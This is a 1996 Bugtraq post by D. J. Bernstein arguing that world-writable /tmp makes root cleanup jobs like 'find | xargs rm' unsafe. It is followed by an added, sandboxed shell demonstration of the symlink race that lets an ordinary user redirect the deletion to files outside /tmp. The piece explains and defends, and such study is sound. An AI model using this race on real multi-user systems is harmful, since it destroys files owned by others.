[3860] in bugtraq
Re: mktemp() and friends
daemon@ATHENA.MIT.EDU (D. J. Bernstein)
Tue Dec 24 20:27:53 1996
Date: Tue, 24 Dec 1996 22:52:49 -0000
Reply-To: "D. J. Bernstein" <djb@koobera.math.uic.edu>
From: "D. J. Bernstein" <djb@koobera.math.uic.edu>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org>
I have a very simple suggestion: eliminate world writability. No more
/var/spool/mail and no more /tmp.

Right now, system security is in the hands of thousands of programs.
That's silly. The only programs that should have to worry about security
are programs that handle untrusted data---i.e., communications programs.

> /tmp has the advantage that it may be cleaned up after a reboot.

What does ``reboot'' mean? Sounds like a Windows feature.

Under UNIX, people want to clean up temporary files in multiuser mode.
How would you suggest doing this?

Everyone knows that if root runs

   find /tmp ... -print | xargs rm

then any user can delete any file on the system. Years ago I proposed
find -print0 and xargs -0, naively assuming that reliable => secure.
Unfortunately, if root runs

   find /tmp ... -print0 | xargs -0 rm

any user can _still_ delete any file on the system. You might give up
on xargs and run

   find /tmp ... -exec rm '{}' ';'

but that _still_ lets any user delete any file on the system.

With per-user tmp directories, the problem disappears: setuid to joe and
remove old files in ~joe/tmp.

> Finally, what if you're using an NFS-mounted ~

Each user should have a separate storage area on each host. Otherwise:

   setenv TMPDIR ~/tmp/`hostname`; mkdir $TMPDIR

---Dan

Put an end to unauthorized mail relaying. http://pobox.com/~djb/qmail.html
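The point of the post is that -print0/-0 fixes the *parsing* of file names but not the *resolution* of the path at the moment rm runs: between find seeing /tmp/joe/cache/stale and rm unlinking it, joe can turn /tmp/joe/cache into a symlink to a directory root owns. The following shell script is an added demonstration of that race, not code from the post or from any of Dan's software. It assumes nothing about the host beyond a find/xargs that support -print0/-0; the scratch tree created with mktemp -d, the user name "joe", the file name "stale" and the directories standing in for /tmp and /etc are all constructed for the example, and the "root" and "joe" steps are simulated in one process by capturing find's output before the attacker step and feeding it to xargs afterwards, which is what the pipe's buffering lets happen in real life.

```shell
#!/bin/sh
# Added demonstration of the symlink race in `find /tmp ... -print0 | xargs -0 rm`.
# Not from the original post. Everything lives under one mktemp -d scratch
# directory, so it runs as an ordinary user; $victim_dir stands in for a
# directory that the /tmp cleanup job was never supposed to touch.

demo_race() {
    sandbox=$(mktemp -d) || return 2
    fake_tmp="$sandbox/tmp"          # stands in for world-writable /tmp
    victim_dir="$sandbox/etc"        # stands in for a root-owned directory
    mkdir -p "$fake_tmp/joe/cache" "$victim_dir"
    echo "important" > "$victim_dir/stale"     # file root wants to keep
    : > "$fake_tmp/joe/cache/stale"            # joe's genuinely old temp file

    # Stage 1 ("root"): find enumerates paths to delete. In a real pipeline
    # xargs only execs rm after find has emitted a batch, so every name is
    # resolved a second time, by rm, some time after find stat()ed it.
    find "$fake_tmp" -type f -name stale -print0 > "$sandbox/list"

    # Stage 2 ("joe", inside that window): /tmp/joe is joe's own directory,
    # so he may replace the subdirectory find walked with a symlink to the
    # directory he wants the cleanup job to hit.
    rm -rf "$fake_tmp/joe/cache"
    ln -s "$victim_dir" "$fake_tmp/joe/cache"

    # Stage 3 ("root"): xargs hands the recorded, NUL-delimited path to rm.
    # The kernel resolves the symlinked directory component, and rm unlinks
    # $victim_dir/stale instead of anything under /tmp.
    xargs -0 rm -f < "$sandbox/list"

    if [ -e "$victim_dir/stale" ]; then
        result=1    # victim survived: the race did not land
    else
        result=0    # file outside /tmp deleted by the "/tmp cleanup"
    fi
    rm -rf "$sandbox"
    return $result
}

if demo_race; then
    echo "race landed: a file outside the simulated /tmp was deleted by the cleanup"
else
    echo "race did not land"
fi
```

The -exec rm '{}' ';' variant the post mentions has the same shape; the window between find's stat() and rm's unlink() is merely shorter, since rm is spawned per file, and a user who can win the window once can retry until it lands. Nothing in the pipeline re-checks that the path still names the file find saw, which is why the post's answer is to stop having root resolve paths under attacker-controlled directories at all and instead clean ~joe/tmp as joe.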